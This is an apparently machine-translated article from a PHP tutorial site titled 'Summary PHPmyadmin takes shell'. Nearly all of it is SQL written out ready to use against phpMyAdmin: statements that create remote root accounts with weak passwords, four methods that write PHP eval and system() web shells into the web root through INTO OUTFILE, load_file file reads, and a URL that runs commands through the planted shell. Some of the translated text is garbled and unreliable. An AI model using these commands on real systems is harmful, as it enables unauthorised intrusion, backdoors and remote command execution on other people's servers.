Home >Database >phpMyAdmin >Summary PHPmyadmin takes shell

Summary PHPmyadmin takes shell

藏色散人
藏色散人forward
2021-01-04 14:37:482012browse

The following is a summary for everyone in the phpmyadmin usage tutorial columnphpmyadminGet the shell, I hope it will be helpful to friends in need!

Summary PHPmyadmin takes shell

PHPmyadmin takes shell summary

PHPmyadmin changes user password

Click directly on localhost or 1270.0.1 above, the user column will appear, click to modify

Add the super user guesssec password ooxx and allow external connections

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;

We can create a root account and set a password

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

In this way, a root external link account is created, the password is 123456, use 123456 for external links

Four classic methods of using shell:

Method one:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
    一句话连接密码:7on

Method two:

读取文件内容:    select load_file(&#39;E:/xamp/www/s.php&#39;);
写一句话:    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限:    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Method three:

JhackJ version PHPmyadmin takes shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数: 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数: 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。

Method 4:

select load_file(&#39;E:/xamp/www/study.php&#39;);
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Then visit the website directory: http://www.2cto.com/study.php?cmd=dir

Phpmyadmin appears when exporting a sentence (Errcode: 13 - Permission denied)

There is no permission for this directory. You can try the upper-level directory or the lower-level directory

If that doesn’t work, try NTS traffic

Also, pay attention to the directory\

The above is the detailed content of Summary PHPmyadmin takes shell. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:cnblogs.com. If there is any infringement, please contact admin@php.cn delete